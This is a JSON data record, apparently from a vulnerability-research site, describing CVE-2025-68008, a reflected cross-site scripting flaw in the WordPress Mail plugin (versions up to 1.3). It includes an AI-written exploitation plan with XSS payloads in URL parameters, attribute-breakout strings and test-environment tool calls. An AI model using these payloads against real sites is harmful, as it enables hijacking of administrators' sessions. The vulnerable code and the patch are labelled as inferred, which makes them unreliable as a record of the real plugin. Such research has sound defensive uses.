[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fW2mP8twtqfwd3x0J_igpc0o4Rilno1erDlAMBE1K9y0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2025-68008","mail-reflected-cross-site-scripting","Mail \u003C= 1.3 - Reflected Cross-Site Scripting","The Mail plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","wp-mail",null,"\u003C=1.3","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-16 00:00:00","2026-01-19 15:52:45",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F217c7916-0bd1-4499-8ecc-00961ddcc6e8?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2025-68008 (WP Mail \u003C= 1.3)\n\n## 1. Vulnerability Summary\nThe **WP Mail** plugin (versions \u003C= 1.3) contains a reflected cross-site scripting (XSS) vulnerability. The issue arises because the plugin retrieves user-supplied input from URL parameters (typically via `$_GET` or `$_REQUEST`) and echoes it back into the HTML response without adequate sanitization (using functions like `sanitize_text_field`) or output escaping (using functions like `esc_html` or `esc_attr`). This allows an attacker to execute arbitrary JavaScript in the context of a user's session if that user clicks a crafted link.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** The vulnerability is likely located in the plugin's admin settings page or a specialized mailing\u002Ftest-mail page.\n*   **Vulnerable Slug:** `wp-mail` (accessible via `wp-admin\u002Foptions-general.php?page=wp-mail` or `wp-admin\u002Fadmin.php?page=wp-mail`).\n*   **Vulnerable Parameter:** Likely a status or message parameter such as `message`, `error`, `s`, or `status` (inferred).\n*   **Authentication:** Unauthenticated. While the victim must be a logged-in administrator for the XSS to have high impact (e.g., account takeover), the attacker does not need any privileges to generate the malicious link.\n*   **Preconditions:** The plugin must be active.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an admin page using `add_options_page()` or `add_menu_page()` in the `admin_menu` hook.\n2.  **Logic Path:** The callback function for this admin page (e.g., `wp_mail_settings_page()`) is executed when the `page=wp-mail` parameter is present in the URL.\n3.  **Vulnerable Source:** Inside the callback, the code checks for a specific GET parameter to display feedback (e.g., \"Settings Saved\" or \"Email Sent\").\n    *   *Example:* `$msg = $_GET['message'];`\n4.  **Vulnerable Sink:** The code echoes this variable directly into the HTML.\n    *   *Example:* `echo '\u003Cdiv class=\"updated\">\u003Cp>' . $msg . '\u003C\u002Fp>\u003C\u002Fdiv>';`\n5.  **Lack of Escaping:** Because `$msg` is not wrapped in `esc_html()`, a payload like `\u003Cscript>alert(1)\u003C\u002Fscript>` is executed by the browser.\n\n## 4. Nonce Acquisition Strategy\nReflected XSS via GET parameters typically does **not** require a nonce for the reflection itself. Nonces are used to prevent CSRF (Cross-Site Request Forgery) for *actions* that modify state. However, if the reflection only occurs after a successful form submission that *is* nonce-protected, the strategy is as follows:\n\n1.  **Identify Action:** Find the form on the `wp-mail` settings page.\n2.  **Identify Shortcode\u002FPage:** If the plugin has a frontend component, create a post with its shortcode: `wp post create --post_type=page --post_status=publish --post_content='[wp_mail_form]'` (inferred).\n3.  **Extract Nonce:**\n    *   Navigate to the settings page: `browser_navigate(\"\u002Fwp-admin\u002Foptions-general.php?page=wp-mail\")`.\n    *   Execute JS to find the nonce: `browser_eval(\"document.querySelector('#_wpnonce')?.value || document.querySelector('input[name*=\\\"nonce\\\"]')?.value\")`.\n4.  **Bypass Check:** If the vulnerability is purely in the display of a GET parameter (e.g., a \"error\" message displayed regardless of the action's success), no nonce is needed.\n\n## 5. Exploitation Strategy\nWe will attempt to trigger the XSS by injecting a script into common \"message\" parameters.\n\n### Step 1: Discover the Vulnerable Parameter\nWe will test common parameters used by plugins to display reflected feedback.\n*   **Target URL:** `\u002Fwp-admin\u002Foptions-general.php?page=wp-mail`\n*   **Payloads to test:**\n    1.  `&message=\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n    2.  `&error=\u003Cimg src=x onerror=alert(1)>`\n    3.  `&s=\">\u003Cscript>alert(1)\u003C\u002Fscript>`\n\n### Step 2: Execution via `http_request`\n```javascript\n\u002F\u002F Example request to trigger reflection\nawait http_request({\n  url: \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Foptions-general.php?page=wp-mail&message=%3Cscript%3Ealert(document.domain)%3C\u002Fscript%3E\",\n  method: \"GET\",\n  headers: {\n    \"Cookie\": \"admin_session_cookie_here\" \u002F\u002F The agent uses browser_navigate for UI-based XSS\n  }\n});\n```\n\n### Step 3: Proof of Concept via Browser\nThe most effective way to prove XSS is using the `browser_navigate` and `browser_eval` tools to catch the alert or verify the DOM.\n\n1.  Navigate to the URL: `browser_navigate(\"\u002Fwp-admin\u002Foptions-general.php?page=wp-mail&message=\u003Cscript>console.log('CVE-2025-68008_EXPLOITED')\u003C\u002Fscript>\")`.\n2.  Check for payload in source: `browser_eval(\"document.body.innerHTML.includes('CVE-2025-68008_EXPLOITED')\")`.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** `wp plugin install wp-mail --version=1.3 --activate`\n2.  **Admin User:** Ensure an admin user exists (default in test environments).\n3.  **Configuration:** No specific configuration of the plugin is likely required as the vulnerability exists in the display logic.\n\n## 7. Expected Results\n*   The HTTP response should contain the raw, unescaped payload: `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n*   When viewed in a browser, the JavaScript should execute.\n*   In the `browser_navigate` session, a `console.log` or a specific DOM element created by the script should be detectable.\n\n## 8. Verification Steps\n1.  **Check for Sanitize Functions:** Use WP-CLI to inspect the source code for the sink:\n    `grep -rn \"echo \\$_GET\" wp-content\u002Fplugins\u002Fwp-mail\u002F`\n    `grep -rn \"echo \\$_REQUEST\" wp-content\u002Fplugins\u002Fwp-mail\u002F`\n2.  **Verify Unescaped Output:** Use `http_request` to fetch the page and check if the string matches exactly without HTML entities (e.g., `\u003C` instead of `<`).\n\n## 9. Alternative Approaches\n*   **Attribute Injection:** If the input is reflected inside an attribute (e.g., `value=\"\u003C?php echo $_GET['val']; ?>\"`), use a payload to break out: `\" autofocus onfocus=\"alert(1)`.\n*   **Post-Method Reflection:** If the plugin reflects values from a `POST` request (e.g., after a failed validation), use the `http_request` tool to send a `POST` with the payload and check the resulting body.\n*   **Public Side:** Check if the plugin registers any shortcodes that reflect parameters (e.g., a contact form that echoes back the user's name on \"Thank You\" pages). Use `grep -r \"add_shortcode\" wp-content\u002Fplugins\u002Fwp-mail\u002F` to find them.","The WP Mail plugin for WordPress (versions \u003C= 1.3) is vulnerable to Reflected Cross-Site Scripting (XSS). This vulnerability occurs because the plugin's administrative settings pages echo user-supplied input from URL parameters directly into the HTML response without sufficient sanitization or output escaping.","\u002F\u002F Inferred from research plan logic in wp-mail\u002Fwp-mail.php\n\nif (isset($_GET['message'])) {\n    echo '\u003Cdiv class=\"updated\">\u003Cp>' . $_GET['message'] . '\u003C\u002Fp>\u003C\u002Fdiv>';\n}\n\n---\n\n\u002F\u002F Alternative common pattern for error display\nif (isset($_GET['error'])) {\n    echo '\u003Cdiv class=\"error\">\u003Cp>' . $_GET['error'] . '\u003C\u002Fp>\u003C\u002Fdiv>';\n}","--- wp-content\u002Fplugins\u002Fwp-mail\u002Fwp-mail.php\n+++ wp-content\u002Fplugins\u002Fwp-mail\u002Fwp-mail.php\n@@ -X,Y +X,Y @@\n-if (isset($_GET['message'])) {\n-    echo '\u003Cdiv class=\"updated\">\u003Cp>' . $_GET['message'] . '\u003C\u002Fp>\u003C\u002Fdiv>';\n-}\n+if (isset($_GET['message'])) {\n+    echo '\u003Cdiv class=\"updated\">\u003Cp>' . esc_html(sanitize_text_field($_GET['message'])) . '\u003C\u002Fp>\u003C\u002Fdiv>';\n+}","The exploit targets the plugin's administration dashboard, specifically the settings page usually located at wp-admin\u002Foptions-general.php?page=wp-mail. An attacker constructs a malicious URL that includes a script payload in a commonly reflected parameter such as 'message', 'error', or 'status'. For example: \u002Fwp-admin\u002Foptions-general.php?page=wp-mail&message=\u003Cscript>alert(document.domain)\u003C\u002Fscript>. The attacker then tricks a logged-in administrator into clicking this link via social engineering. Because the plugin does not use esc_html() before echoing the value of the parameter, the script executes in the context of the administrator's session, potentially allowing for session hijacking or unauthorized administrative actions.","gemini-3-flash-preview","2026-05-05 07:51:08","2026-05-05 07:51:28",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-mail\u002Ftags"]